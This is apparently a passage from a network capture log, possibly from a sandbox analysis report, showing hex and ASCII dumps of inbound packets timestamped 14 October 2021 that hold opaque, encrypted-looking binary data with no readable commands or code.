2021-10-14 02:15:48 UTC	91	IN	Data Raw: 71 03 0a ce 29 a4 e5 3b 25 36 85 60 a8 59 d3 2b d3 01 32 6c 50 eb 6c 5a 8d 71 74 3c 6a af ba 43 93 82 35 e4 1a 49 61 fa 3e c7 ad 68 30 b5 5c c7 52 bd 20 1e 46 5e b6 f2 f5 78 4d ef c9 70 06 fe 95 d7 7d 53 10 ef 21 ee 64 7f 59 4c b9 40 32 a2 be 95 62 2b de b9 08 99 f6 31 b4 17 96 a4 7b ab 42 a4 04 b7 f0 74 e7 78 2e 95 f4 0d fb c7 59 7a 7a ef 41 11 27 5a af fe 42 ea fd 1e 88 b7 17 c0 7b 7d 41 82 86 96 b0 60 d0 8f b1 79 1e d4 c3 8e 1e d2 a7 6d e9 43 03 4c 70 d3 ed 0a 89 34 f4 84 03 ab 3d d1 44 35 44 71 02 b6 10 fb 3c 1b 64 2e 70 c8 c5 18 33 e1 98 13 84 3a 4b 9b a4 9e 3e ba 10 ee b9 27 5d ba 8f 32 68 cc c8 0b f9 aa 15 a9 2d b3 9c aa 8c d8 55 cd 92 c4 64 7e 72 cc ea 9d 5e 76 3f 92 6d 37 10 8a 4c 10 68 8c 18 dd 49 0f 17 7c 20 33 d6 8d 91 28 f0 8f c9 cb 5e 4f ad Data Ascii: q);%6`Y+2lPlZqt<jC5Ia>h0\R F^xMp}S!dYL@2b+1{Btx.YzzA'ZB{}A`ymCLp4=D5Dq<d.p3:K>']2h-Ud~r^v?m7LhI\| 3(^O
2021-10-14 02:15:48 UTC	92	IN	Data Raw: 8f 1b 4c 23 f9 a6 ae dd a7 bf d6 1b c3 0a 8b a9 f1 7c ec 73 2e 83 a1 0d bb f6 ea ca 39 c6 9b d7 87 a5 d8 60 12 19 c1 03 1f 17 d5 72 35 3c 60 d0 ce 7f bf 45 05 49 21 f3 ad 6e b4 48 95 07 cc ac 95 06 c3 be 1c 57 4c 90 02 92 40 7b 80 cd 4b 5b e6 e3 7d f1 a9 d2 e1 9c 68 2f 14 26 b6 29 e4 ea 85 87 33 84 12 9c 3e e4 aa 4b db 6a e2 b9 ce 33 6d 9c 38 14 fb 3f 43 fc 56 6f 02 2e 81 ee 8d c5 a1 e4 5a 9f 62 73 04 7b 6c 13 81 3e 38 33 1c fe a9 87 e2 1d d1 90 bc 16 7a 3b 80 db dc c4 1b c0 85 be 76 03 c7 83 d7 36 76 fe 9b 11 b3 3f ea 19 8c 88 2d 9f ea 99 8b 64 8e 09 8e e2 ab 9a cb 0a fb 13 90 29 ca 12 21 71 c0 eb 9f 39 8b 40 29 99 d1 60 bf 97 89 ec b8 2a 21 f5 76 f4 33 0b 4a d0 e8 17 96 3d 5f 79 40 21 51 9f c6 bb 33 e4 ef ce ef 75 47 24 bd e5 8d 6a 5d 63 28 34 18 bc 6b Data Ascii: L#\|s.9`r5<`EI!nHWL@{K[}h/&)3>Kj3m8?CVo.Zbs{l>83z;v6v?-d)!q9@)`*!v3J=_y@!Q3uG$j]c(4k
2021-10-14 02:15:48 UTC	93	IN	Data Raw: ca ff fc c9 dc a5 05 c3 29 06 28 70 79 47 38 8a ac 18 c9 39 d9 ec b3 d7 b6 8e 3e ce 76 e2 5c a2 fa 8d 04 83 91 cd 6d 12 c8 74 6d 62 cc a4 85 3b 73 01 0d bf 40 a9 52 c0 23 5d 3b 3a 44 3e f8 6b 4d ae 8c cf 3e 6c 81 03 54 80 97 01 e1 18 43 69 c2 3f c7 a7 a5 07 82 60 d8 c4 bc 2a 0b 5c 54 87 f8 dd a9 c9 c7 1a 62 10 eb a9 6a 68 42 11 e9 37 fc 63 57 72 5f ab 59 c4 34 ae 92 5d be d6 ca 2a 8d f4 4c 7b 1f 87 a8 e4 10 3a 56 11 6d e5 6d e7 76 00 4b f9 83 4c d2 f8 b5 6f fc 4b 2b 38 d1 b1 e2 4e 00 37 30 9a a2 03 dc ba b8 de 80 84 83 1d ae de 9e bb 44 45 f4 23 8e 1f b2 0e bb ed 42 14 5f ea 0e fa dc 05 0b e0 90 2a 20 7a d3 4e 17 ac 63 02 bc 1a e4 25 22 d2 04 37 cf d3 9f 25 ec f7 04 91 2e 55 dc 23 9c 3e b6 2e a7 bc 33 44 ad 94 57 5d 42 7f 1e 21 c2 da ba 22 9c 9d ce 8b c9 Data Ascii: )(pyG89>v\mtmb;s@R#];:D>kM>lTCi?`\TbjhB7cWr_Y4]L{:VmmvKLoK+8N70DE#B_* zNc%"7%.U#>.3DW]B!"
2021-10-14 02:15:48 UTC	95	IN	Data Raw: 8d b3 45 d4 7d c4 f4 b7 8b 4f 71 d2 0e b7 e2 9d 48 c7 c2 b7 4a 1d 69 96 dd 59 24 ed 88 5c cc 50 cc 0d 12 51 cb 09 82 5d 2f fb 7d 6f fb ee 7a 32 fa b0 69 b8 00 c7 09 85 d7 9e 6f e9 f7 95 80 a9 33 bd 9c ea cc 50 b9 9d c6 89 95 37 68 1f 0f e3 7b 03 c6 d1 78 5c 41 66 5c bf 59 94 62 3c 5f 08 82 a7 1d e4 67 88 1c bd 95 be 2f c3 b8 73 28 7e 95 08 0a 50 70 86 1c 45 34 c3 f7 6e f1 fe 11 e2 9c 62 09 14 22 be f5 09 e5 b8 83 33 9b 3b 1c d2 1d 4a 48 e5 50 f3 a3 ec f7 7c 62 3f 57 9c 35 52 f3 fe c9 df 33 94 ec b6 73 a3 f5 56 92 11 75 28 73 55 4f 94 2a 10 8c 0f f4 a3 be f9 02 c3 64 d2 57 73 2a 8f c7 34 cf 33 e4 99 ad 63 66 ab 90 dd 23 59 0e 9f 2c b3 57 29 1d 02 35 aa 9a f1 d5 b4 67 8a 38 3f fc bd 64 9e 0d f5 06 87 6e 48 09 01 e1 d6 f8 9f 15 c8 5b 3a 70 4a 5f ac 8c 8b f6 Data Ascii: E}OqHJiY$\PQ]/}oz2io3P7h{x\Af\Yb<_g/s(~PpE4nb"3;JHP\|b?W5R3sVu(sUOdWs43cf#Y,W)5g8?dnH[:pJ_
2021-10-14 02:15:48 UTC	96	IN	Data Raw: f9 6f 5d 01 85 e4 3c ec 73 aa d4 f5 4e af 0e 15 d7 8a 2e a6 a5 1b fa f3 5a e9 ca ca 79 f7 76 f6 17 cc 6e da bb b1 08 d2 a6 cf 91 25 d8 da a3 7c 1e 54 e6 2c 72 06 b1 38 8a bb 3e 50 42 43 ec b3 d3 d9 10 3f ce 72 e3 23 56 48 8c 00 93 0e 9e 02 13 c8 7a 2e 01 e6 8a 8d e5 3d 57 03 8a 40 a3 22 dd 2f 76 a5 33 6c 5b d4 60 63 a8 5b cb 38 19 8f ae 55 8a eb 25 e0 76 a5 41 fa 3b c5 a8 75 20 8f 30 ef c4 ba 5d fa 55 57 a3 d3 dd a9 49 fc ff 62 10 27 81 c5 69 42 17 cf 21 ed 4c 68 4a 5f a1 51 0c 49 53 95 64 3c d5 dc 57 76 f6 37 a3 1d 84 d1 8f a7 2d 88 04 b3 8b 84 f4 7d 3c 86 d9 83 0c d1 83 e4 44 fc 4f 3b 4e ac a2 ef 48 79 98 43 98 a6 18 aa 4e 6e 44 97 8a fa 85 73 de 9a bd 07 44 e4 25 95 11 d5 55 6f e9 48 6f ad 67 09 fe de 7f fb f4 84 06 81 15 9c 45 3f 3a 61 79 55 0b e8 35 Data Ascii: o]<sN.Zyvn%\|T,r8>PBC?r#VHz.=W@"/v3l[`c[8U%vA;u 0]UWIb'iB!LhJ_QISd<Wv7-}<DO;NHyCNnDsD%UoHogE?:ayU5
2021-10-14 02:15:48 UTC	97	IN	Data Raw: d9 90 1c ba bc 9d 29 bd 59 ef 46 e8 e0 b3 03 72 f3 3d 3f ee 28 0b 70 f5 4e 12 0a 19 bc 69 12 50 2e a9 4e 99 74 a1 48 38 f0 8d b3 5f c0 01 f5 f6 a6 84 47 9e df 4d 4f e5 b8 bc af 1e b4 4a 11 09 e7 ce 54 06 22 f7 5e ca 41 ae 79 19 42 c4 25 a5 5e 29 0b 13 77 fa f6 63 26 f6 b6 ba cc f6 c7 25 85 bf f2 10 02 fd 99 95 be 08 96 9f fb cf 29 2b 9e ea 80 a4 35 66 19 0f e8 0b 3d 3a d0 5e 31 06 61 64 9a 80 40 bb 07 4c 22 e8 97 1f e2 71 95 0d b6 70 90 2c d2 aa 17 50 76 96 04 58 d6 7b 80 0c 58 5f e5 f1 46 b6 90 7d ea 8d 6c 25 29 2b af 57 8d eb a9 8c 08 81 2d 34 2f e2 bf 56 52 6b 3c a6 e1 04 4f 62 39 32 fd 1f 6a f9 d8 d2 0a 22 99 d2 9e ce b1 f5 50 84 9c 52 28 78 7f 5b 8e ab 38 2f 0e 1e ab be ff 02 c3 64 bf 2c 0c 20 84 e1 21 c6 0d bd 91 ac 65 0d c5 e1 a2 2b 7f 0a e7 31 b9 Data Ascii: )YFr=?(pNiP.NtH8_GMOJT"^AyB%^)wc&%)+5f=:^1ad@L"qp,PvX{X_F}l%)+W-4/VRk<Ob92j"PR(x[8/d, !e+1
2021-10-14 02:15:48 UTC	98	IN	Data Raw: f8 fc 90 3b 3d 07 98 23 69 49 66 10 23 b1 1e 44 23 b4 bc bc 89 b4 54 5d 84 ee 5d 63 74 d5 f3 72 50 cb 2a 9a 14 62 e8 8a 4c 1e 5f 51 15 dd 4b 3b cd 7d 0c 30 c2 88 fd 28 e6 59 de d9 43 40 b4 79 39 b8 15 02 54 d1 7f 42 f6 be dc a8 ea bc c2 5d 6d 0f ee 0e 12 fc ba 6f 66 fe 1a 44 2b 0e 59 27 d6 52 f6 20 f9 97 ca fc 07 ea b5 9d 18 f7 d9 7c 49 9e 25 e3 bb d8 87 92 ab 8a 41 2e 44 24 7f 96 6f 32 88 38 19 a2 ff 4d 6b 12 43 17 6f 1f 32 f1 8d b2 d6 d8 b4 70 bb 90 8b 2f 89 a3 f1 0e e8 cc b0 67 04 eb 2e 31 9d 44 0d 6c 01 43 23 15 1e a5 7e 64 10 d0 a8 68 9e 6a b0 3f 8c e0 89 af aa db 3e f5 dd 5d 9a 4a 64 de 70 5c fa 63 43 84 af b6 5d 24 53 82 df 50 0c 40 8e 4b 34 4a 8f 65 08 42 c5 25 a5 5f 20 0b 13 77 f2 e7 72 5e fb a6 bf d3 17 cf 1a 8b b8 e5 69 f2 03 98 bd a7 02 99 83 Data Ascii: ;=#iIf#D#T]]ctrP*bL_QK;}0(YC@y9TB]mofD+Y'R \|I%A.D$o28MkCo2p/g.1DlC#~dhj?>]Jdp\cC]$SP@K4JeB%_ wr^i
2021-10-14 02:15:48 UTC	99	IN	Data Raw: f4 1d 88 c0 1d 2d 2f 45 53 e7 84 2a 9f 4a 2f 62 cb b2 bd a3 91 e4 c3 2b 2a e8 8c d9 14 10 48 d1 c5 cd 8d 33 ab 78 7d 3f 58 8e 43 b6 1e e2 c0 70 7a 63 54 24 aa 2e 94 72 af 7c 17 3b 09 aa 7f 13 bd 42 53 be 4f 1b d8 04 e6 3e 57 20 56 a4 14 df 4c f7 6d 24 01 0e 18 bc 08 47 74 67 87 26 69 22 3c 80 18 0c 9c 73 0c e3 33 9e b3 87 14 d1 83 88 e2 8c 51 1e 92 8a 93 f9 66 fa e6 f3 01 4e 3b c8 69 d2 2c 90 4b c9 a1 75 00 40 be c2 af d4 55 f5 39 8e 36 9c d7 92 b9 3d 89 69 95 9d 8c 23 fd 07 e6 e8 09 d5 d4 f0 78 80 f2 3d 6e 80 23 34 3e 70 ba c3 1a 4b c9 06 7f fe 2f 09 22 57 7c 71 48 18 ac ef 05 c7 67 54 d3 aa 6b ba 1d 1a ad 9f 3d 8b ba e1 db 20 a7 c2 cf c3 9b 22 a7 0b 3d d9 2d 88 ba b4 00 a8 a4 14 ec fa c9 d8 dc 6e 1b 29 02 01 79 2a 5a 3c 8a ae 7d d0 40 06 e6 c9 a0 a6 12 Data Ascii: -/ESJ/b+H3x}?XCpzcT$.r\|;BSO>W VLm$Gtg&i"<s3QfN;i,Ku@U96=i#x=n#4>pK/"W\|qHgTk= "=-n)y*Z<}@
2021-10-14 02:15:48 UTC	100	IN	Data Raw: 49 6d 05 f8 df 0c 70 3f 85 02 85 56 df 40 37 5f 16 02 b6 01 b9 26 01 b2 17 33 dd 94 04 29 32 fd 0d a9 3c 49 9b d7 9c 3e b6 da fa 96 33 4f ac 99 23 6d 42 79 1c 3e 9a 03 b0 22 98 b5 bb 90 f9 5f 5c 83 eb 43 6f a8 dd ed 9d 53 b7 5b 93 0d 1f fe fe 70 1a 40 59 34 d6 6b 09 31 7c 26 4a 46 89 80 2d 9d 5b 8a ab 86 41 bc 66 cd 91 aa 0a 57 f3 fd 6b 65 b6 f0 4a fc b9 bc c6 76 f1 e5 0a d6 d6 06 75 79 fa 14 34 b6 f2 58 01 cf 53 d9 60 f8 90 e2 6d 1a e0 b3 8e 15 e2 36 78 0a 0a 30 ef b1 fd b2 9a 05 9a 68 24 00 eb 46 cb 96 e1 69 2e 37 a0 ca 35 72 b2 43 13 67 df 37 8a 86 a5 c5 d8 9d e7 c0 b4 8a 2f 9c c8 2c f1 e9 e6 93 62 08 d9 aa 37 9d 5f 24 ca 21 4c 1d 1f e2 aa 5f 17 49 cb c7 35 92 77 a9 e7 8e a1 e2 7d 55 da 14 e1 f2 d8 49 58 60 d8 63 08 99 90 43 a8 ac 9d 73 17 7a 91 c5 56 Data Ascii: Imp?V@7_&3)2<I>3O#mBy>"_\CoS[p@Y4k1\|&JF-[AfWkeJvuy4XS`m6x0h$Fi.75rCg7/,b7_$!L_I5w}UIX`cCszV
2021-10-14 02:15:48 UTC	102	IN	Data Raw: 34 70 2a 81 e8 ab 73 ad e8 03 af 65 03 d1 8a b2 80 7f 00 90 22 ae 2b fd 1d 13 39 e4 9f 0b 92 b4 65 ae 18 8c fd bd 77 ce 39 fd 11 9e 3e 0d 07 36 75 29 f9 b9 1b 98 31 30 66 d0 48 be 8c e1 fb b9 3b 2f 87 5a f4 1f 0a 73 4e c7 dc 82 38 4f 16 f8 2b 4e 86 27 a6 0c e4 c4 0e f6 7e 48 d0 bc d8 93 74 d8 6c 05 3e 0d bc 6c 0c cd f4 10 18 4d 60 c0 1a fb 29 46 1b 7a 5d f4 30 ab e5 44 06 12 70 09 b2 f6 42 5a 7e fe 00 6a 59 28 ee cd 09 12 c2 9c ae 5f 1b bf ff 8b d1 f9 89 e2 80 51 1f 92 89 93 f9 65 fe 15 0c 2c 6b 49 d5 79 d6 16 71 a9 25 58 6a 1f 55 a4 ce 40 d0 66 f7 ff 62 1a 89 d0 8f cf 20 8e 69 80 f4 10 df fc 21 e7 0a c2 03 df ef 6f 80 f1 3d 6e 83 24 de c1 5d 9d cf 63 15 c6 07 7b d6 85 e7 31 51 76 7f 5b 15 57 ee 38 ce 73 a9 bd 51 69 ad 08 12 b2 87 2b 92 ad 0e dc 13 b8 17 Data Ascii: 4p*se"+9ew9>6u)10fH;/ZsN8O+N'~Htl>lM`)Fz]0DpBZ~jY(_Qe,kIyq%XjU@fb i!o=n$]c{1Qv[W8sQi+
2021-10-14 02:15:48 UTC	103	IN	Data Raw: 99 06 c6 fc 4f 30 28 58 a6 ef 5d 7f f7 ce 9b 8a 05 d5 d6 60 45 93 8c 9e 4b 5b 47 9c bf 62 1d fd 4a 36 13 a6 2c 70 fa 46 12 58 63 16 ed 22 05 33 cf 86 79 8d 7b d3 40 21 bd 48 02 b6 0a e5 38 1c 73 56 ab c0 d2 0d 69 70 fe 1d 9e a6 48 ed 9c 00 37 a6 10 61 b5 28 58 20 90 3f 79 de 76 01 35 25 0a ac 3c f7 1c bb 8b c3 45 44 97 ee 43 7e 70 c2 e6 72 50 cb 09 9f 77 11 fb 8b 48 18 3b 54 18 dd 47 48 b9 7e 20 33 af 89 fb 36 e6 59 de 12 67 db be 60 cd af 27 67 fe f9 f0 49 e9 b8 e3 44 f0 a1 c6 4a 6f 0f ee 0e 0c d5 7d 7d 6b fe 16 5c ac 47 ee 23 45 57 f2 57 fc 8e a5 51 18 e0 b3 82 0a f2 23 7d 74 98 2f 11 ba fc 8f 9a 2e 85 6c 2c 6b 3e 6a e3 09 cf 77 35 25 a9 a0 e7 6b b3 49 09 7c ca 32 e0 98 bb d7 22 8d ce b4 92 f0 25 99 a7 ec c9 6e 1e 4a 8f 11 e2 2e 31 9d 44 0d 6f e7 bc 0e Data Ascii: O0(X]`EK[GbJ6,pFXc"3y{@!H8sVipH7a(X ?yv5%<EDC~prPwH;TGH~ 36Yg`'gIDJo}}k\G#EWWQ#}t/.l,k>jw5%kI\|2"%nJ.1Do
2021-10-14 02:15:48 UTC	104	IN	Data Raw: c5 2c 7c 0d bf 3a f0 3d 5b 23 60 b6 a9 3e 9f f8 9a d0 ba e6 58 84 8d 7a 37 6b aa 5a ac 2a 3b 7f 0c a4 d2 b6 e9 02 c7 7b dc 47 51 2b 85 e5 3a dd 08 c8 9a bc 6d 16 ce 6c dc 05 6d 02 e1 33 b9 38 ff 0a 15 4c 6a 96 f5 99 94 71 84 0b 8c fd ac 6c d5 38 0f 03 b4 29 1f 51 52 72 d6 f8 91 3a ca 31 25 66 d0 48 82 f9 9a e6 b8 24 34 fb 80 f5 0e 04 44 c3 3b dd a4 24 5d 16 fb 2b 4e 86 27 a2 0c ea c4 0e f8 7e 59 d0 bc d8 8c 71 b5 5c 5d c3 f6 44 65 05 50 4b 7f a0 45 7f dc fb e7 16 51 18 3b 20 f2 21 55 e0 76 64 64 f4 f8 4c e9 51 4b 75 85 30 63 46 23 7f 19 24 1f d2 b3 23 87 a3 a6 ee 82 b8 4f 99 f1 82 4e 1f 89 99 6d e9 4f e6 fc 1e 08 62 26 c8 67 f2 ec 7c 99 34 75 6f 36 e9 47 3d 41 fb 4a ed f7 8c 1a f5 d0 90 c2 d3 88 69 80 e4 01 0a e6 0d e8 25 4f 03 f3 ed 6c 98 f7 3a 69 7b 3d Data Ascii: ,\|:=[#`>Xz7kZ*;{GQ+:mlm38Ljql8)QRr:1%fH$4D;$]+N'~Yq\]DePKEQ; !UvddLQKu0cF#$#ONmOb&g\|4uo6G=AJi%Ol:i{=
2021-10-14 02:15:48 UTC	105	IN	Data Raw: cf 30 e7 7f 81 4b 73 a0 50 12 1c 34 97 64 32 dc d6 39 93 f6 26 af 00 91 52 6b 8b 27 9d 03 a8 ee 51 a0 62 2f 97 f1 83 5d d8 9c 63 91 fd 63 36 22 4f b5 af f6 7b eb 30 85 ad 01 df ad 7f 4c 84 76 80 4a 70 c6 8d b7 68 1a ed 3a 84 ed a7 0a 64 e1 53 15 78 d3 16 e6 cf 0c 1f e5 8c 1e 7d 7b ff 49 3c 38 7b d4 9e 80 ea 31 00 66 1b 24 c1 c5 03 2a f3 ed fb 84 16 49 fc 97 4a 32 a3 1d ee b4 33 5f b4 86 2c 91 43 53 08 26 ba 0b a5 36 4e 9d 80 8a c9 50 21 98 eb 43 6b 6b cd fe 84 51 f6 28 82 1c e1 fb a7 42 1f 3b 45 18 dd 47 32 5d 4f 63 26 d4 98 88 27 f6 51 c5 d0 b1 41 90 70 c4 b1 26 02 81 d1 7b 41 f6 be e3 45 ef a5 d1 5d 76 e0 e7 3d 1b 29 07 5f 7e fb 11 53 3d fc 8e 23 e7 54 f2 57 97 8d cb f8 1c ff b7 8e 18 e1 36 75 7a 8e cc ee 97 dc 9f 87 5f cb 10 d3 90 de 58 d8 83 c5 77 2e Data Ascii: 0KsP4d29&Rk'Qb/]cc6"O{0LvJph:dSx}{I<8{1f$*IJ23_,CS&6NP!CkkQ(B;EG2]Oc&'QAp&{AE]v=)_~S=#TW6uz_Xw.
2021-10-14 02:15:48 UTC	107	IN	Data Raw: d5 7c 95 03 3a 69 e7 81 0d 41 77 f3 e3 64 25 e2 7f f1 94 15 3e 04 2c ad 21 0b ef be e7 f8 35 12 9c a0 c9 b5 40 c9 1d f2 a9 c4 28 7a 19 37 39 f0 33 5b ef b7 48 d6 22 94 de 9c b4 af f4 50 80 9e 09 38 72 54 5f 96 2f 3c 98 60 af a9 96 e2 24 c1 15 b3 3b 71 2e 8c f7 4a 54 19 c0 90 8b 72 03 19 b0 df 52 71 01 9a 39 d7 be f9 1d 08 29 91 a9 9d 6d 67 91 50 14 ac ca bd 64 c0 0e c9 02 98 34 c2 01 3f 44 d1 d2 d4 25 9a 4a 3e 67 d0 4c ae 8f 9a e6 0e 3a 2b e8 40 f4 1f 0c 57 d4 c5 dc 92 2e 55 78 42 1b 4c 8c 10 ba 1f e2 cc 1f f0 70 42 25 96 ef 87 71 b4 9c 05 12 0b a3 71 0b 44 55 81 b0 61 62 dd 0e e6 3d 58 e5 6a 77 e9 0b 57 cf 8b 26 6b 11 06 b3 f2 6c 22 7f ad 36 6b 59 26 83 07 12 3a 7f b4 34 57 33 55 ed 91 b8 78 37 e2 8a 44 73 a6 8e 93 ec 49 e5 f8 3d 04 62 f1 c1 78 d6 f5 7d Data Ascii: \|:iAwd%>,!5@(z793[H"P8rT_/<`$;q.JTrRq9)mgPd4?D%J>gL:+@W.UxBLpB%qqDUab=XjwW&kl"6kY&:4W3Ux7DsI=bx}
2021-10-14 02:15:48 UTC	108	IN	Data Raw: 7c 24 ab 55 80 90 33 e3 1f 6c e2 fa 3f cd b9 53 ca a3 48 e9 d2 31 27 18 55 56 b3 ed c9 81 ea ef cf 6c 38 fc 81 c5 63 4e 1f db 09 00 60 7f 4c 48 26 54 1a 34 be 86 60 29 d3 dc 02 6b f2 37 a1 bd 96 a8 7e b3 39 a4 a5 b7 f6 68 dc cb 38 84 f3 af 4e fb bb 6e 7b d4 a2 3e 33 4d b4 62 4b 7b eb 31 8e b2 06 ff 0e 6e 44 99 9c a9 97 77 de 98 a9 e5 0c e5 25 9e 07 b2 32 45 4a 42 12 43 4f bc fa dc 0e 37 42 84 02 89 40 bd bb c0 cf 64 16 9e f9 ec 31 0c 7a 8b 30 c9 c5 13 36 f8 e3 2d 26 3a 41 fe a8 c6 3e bc 0c f7 62 23 6b 94 ae 23 6f 48 72 0a 29 91 3b ba 22 92 6b bb 8d e3 5a 5c 84 ab 5f 6f 74 dd ed 8c 51 e7 20 9d 0c ec fb 8b 4c e9 41 58 19 cd 43 27 33 66 20 39 c4 90 b0 22 e7 dd db c4 4f aa bc 60 d6 91 ca 0c 57 ff fa 41 8d 93 f1 40 f4 98 ed 55 76 fb c2 2e 14 ac 21 72 6a fa 3a Data Ascii: \|$U3l?SH1'UVl8cN`LH&T4`)k7~9h8Nn{>3MbK{1nDw%2EJBCO7B@d1z06-&:A>b#k#oHr);"kZ\_otQ LAXC'3f 9"O`WA@Uv.!rj:
2021-10-14 02:15:48 UTC	109	IN	Data Raw: 50 82 9f c6 89 6f 0e 96 1d 1e eb 3e 30 ee d1 72 33 6c 00 5c b5 7d bf 44 2d 7f 20 f3 a7 16 e2 4a 95 35 b6 bd 90 20 c3 be 1c 44 7c 95 02 2e 41 7b 80 49 4b 5b f7 df 6f fb 91 13 e1 9c 68 39 05 2c a9 23 1a eb a9 8f 22 82 05 c1 2c e2 b5 58 c8 60 e2 0b c5 2c 78 6e 39 38 f0 37 52 f9 d8 da d4 22 9e 41 9f cf a1 6f 50 84 9c 21 2a 73 54 4d 80 3e 38 2f 0f f4 a9 8d d8 0b c3 9b bf 3a 71 c6 85 e1 34 da 96 eb 9a ad 64 1a ce e1 6a 29 7f 0a 89 3b a9 3e ef 35 86 3d fb 92 e2 1e 9f 6e 8e 19 97 f3 ac 6a dc 37 f8 a0 89 30 0f 0e 38 61 c3 ec 82 b4 b5 4a 3e 66 c3 5c ad 9f 8c f1 24 2a 3b ff a0 52 1f 0c 51 f2 d4 cc 9e be 79 66 40 24 58 16 10 ab 1f e2 ce cf e2 61 54 35 95 e0 87 76 a9 4a 30 3f 09 b1 0e 19 43 43 64 a2 44 7f aa 0f f7 33 ce ac 7c 8d 66 0b 55 e4 69 37 17 1a 0e a2 f1 50 37 Data Ascii: Po>0r3l\}D- J5 D\|.A{IK[oh9,#",X`,xn987R"AoP!sTM>8/:q4dj);>5=nj708aJ>f\$;RQyf@$XaT5vJ0?CCdD3\|fUi7P7
2021-10-14 02:15:48 UTC	111	IN	Data Raw: 70 e6 54 c5 f8 8d 0a 99 03 d9 31 10 c8 7a 0f 74 5d a4 8f ef 30 2d 4a eb 40 a9 52 c0 2d 75 72 23 6a 3e 9c 6b 4b 8c 2d 89 3e 6a a8 bf 51 87 ef b4 f7 0b 4e 2e e3 3e c7 a7 57 08 b6 4c c7 cc b9 20 1e 3a 97 a5 f9 d7 81 ff ef cf 6c 3c ff 90 c1 41 4b 12 cf 27 80 a4 7d 4a 55 c4 46 1a 34 b5 9e 75 3c b8 0b 28 9b fc 30 8f fa 84 ac 6c d9 be 8c 06 bd 99 1a f4 7d 32 8f e8 85 23 b6 83 69 65 d1 d0 e4 3f 5a a4 c3 4b 6a ed 5f cd a6 12 dd 71 69 4e 4d 9d a4 4e 44 de 9e b5 7b 0e cd 2f 9a 13 a0 2c 45 d1 42 12 43 b9 09 fc f6 05 03 f4 84 00 83 62 d3 29 ba 30 6f 02 b6 0b e8 31 0a 6c 06 a2 5c c5 07 38 ec f7 04 9e 0a 49 f4 3a 9c 3e bc e9 fd bc 22 66 b7 9c 23 69 56 57 de 21 b9 09 92 33 98 b5 b1 86 b7 c9 5c 84 e0 4f 66 60 f5 e1 89 51 e1 37 10 0b 1f fa 8a 5f 1c 51 5e 0f f5 4e 22 33 7a Data Ascii: pT1zt]0-J@R-ur#j>kK->jQN.>WL :l<AK'}JUF4u<(0l}2#ie?ZKj_qiNMND{/,EBCb)0o1l\8I:>"f#iVW!3\Of`Q7_Q^N"3z
2021-10-14 02:15:48 UTC	112	IN	Data Raw: 9d 33 3e 4a a3 60 06 79 d5 24 b4 51 32 f2 3a 4a fc ee 76 4c ef a6 bf dd 31 71 08 8f b8 dc 7f ec fd 9f 9c ab 33 80 9a ea cc 50 cc 9e c6 89 9f 2a 6a 31 0a e8 14 31 ec f5 72 33 27 69 5e b3 10 75 46 2d 58 3f cb bd 0b 8d be 94 0d b0 95 87 2d c3 b4 34 13 7e 95 04 04 6f 79 80 0b 24 23 f7 f5 64 d3 a4 7f e0 96 7b 28 12 3f a1 1b 4b ea a9 8d 33 85 07 31 1a e3 b5 44 a7 ab e0 a8 ce f6 60 ba 2e e2 e7 e1 df ec d8 d8 d5 31 97 ee 8f c8 a3 8e 67 85 9c 76 47 b8 56 5b 8a e4 20 f7 18 2e ba 87 fb 08 e8 56 ac 33 60 20 87 e7 4a 0e 19 c0 90 a5 74 01 1f 8a 0b 38 75 18 42 eb a0 2f 94 e9 03 3f fd bc e2 92 98 64 a6 4f 86 fd bb 4c e4 24 f1 04 f7 46 1c 01 23 cc c6 f2 82 ef 89 40 2f 6d c1 5d 8d 4d 8b ef 90 32 2b e8 a3 e3 0e 05 d5 63 d2 06 9b 3c 46 75 69 92 4e 8c 38 ab 16 f3 c8 85 ef 71 Data Ascii: 3>J`y$Q2:JvL1q3P*j11r3'i^uF-X?-4~oy$#d{(?K31D`.1gvGV[ .V3` Jt8uB/?dOL$F#@/m]M2+c<FuiN8q
2021-10-14 02:15:48 UTC	113	IN	Data Raw: 72 d9 47 ea 04 c1 1d 9c b1 ae 10 56 a5 e0 ff f2 56 6d a4 f0 ad 20 1e fa a8 3c fc c6 75 57 11 40 51 0d ec a2 d8 c6 1a c1 cf 5c f1 20 7d 74 3a 09 8d dd 6c e2 e9 c9 70 04 15 c5 b7 84 e5 2a 2f 3a b8 be a8 74 da 13 dd 28 32 6c 4e c9 78 40 86 48 c0 25 94 a8 80 53 96 82 23 eb 18 4f 41 eb 34 d8 9b 85 25 8b 44 fe ce a0 60 10 56 57 a7 e6 ea ba 42 ef de 6d 0f e6 7f c4 45 56 10 a0 db ee 64 79 5d 85 bc 85 97 1f bf 95 65 34 c8 c6 39 90 f6 26 ac 00 a8 52 6b 8b 20 8f 88 00 ff 7a 22 a7 2b 80 e6 b3 5f db 83 78 64 e3 5e c4 32 67 b1 ec 45 6c 3d a1 8d 7c 05 01 20 45 44 93 89 8d 79 61 cd 95 bf 79 00 fa 05 61 12 8a 33 64 f1 94 11 40 70 df 6b 0a 07 91 43 ba a3 7d 85 2c 5b 1e 23 68 02 a7 00 f0 cf 0b 40 0f 44 c9 c7 12 24 e7 ee 16 8e 3a 50 ff 9f b7 c0 bd 2a ed ad 34 4d b5 8e f5 fe Data Ascii: rGVVm <uW@Q\ }t:lp/:t(2lNx@H%S#OA4%D`VWBmEVdy]e49&Rk z"+_xd^2gEl=\| EDyaya3d@pkC},[#h@D$:P4M
2021-10-14 02:15:48 UTC	114	IN	Data Raw: 6b d5 3c 18 3b 6c 0b 7a 53 e8 29 42 32 f9 4b eb 0a 07 b5 e9 7c 4b 76 85 30 60 46 14 7f 19 24 1e d5 bc 28 32 e2 b4 e9 97 a1 69 9a e9 8a 5f 05 9e b0 6d e9 4f ee e8 04 17 b4 a6 d3 7c c9 52 6e be 36 4f 61 11 72 45 c3 92 dc 49 70 70 86 02 5f 0a 83 c6 2c aa 7a 9a f2 1b 2a e2 36 11 33 9d 11 dc e6 63 45 66 2a a5 92 ea ad eb 71 96 cd 14 2f fb 14 74 fa 51 f5 3d 6d 88 6f 71 1a ae 80 e8 c3 71 ac c3 8e 07 7f 0c 1f a7 91 03 87 a6 1f cb 07 ba aa 34 fa 5e d7 51 e3 c1 c7 02 c9 a9 ba 02 b9 af d1 12 fb f4 d6 b6 74 05 19 46 68 89 fd 64 26 99 a3 0e 42 49 19 ca 4d d2 f5 36 36 d9 a6 e7 48 82 fb 8d 06 92 64 4a 8c 12 ce 1f d2 08 ce ae 98 3f 54 f5 27 88 4a c6 a2 d2 2b 58 fc 3f 73 76 eb 60 4b 97 52 d4 0a 94 a8 80 73 89 86 f1 f0 64 b8 40 fa 39 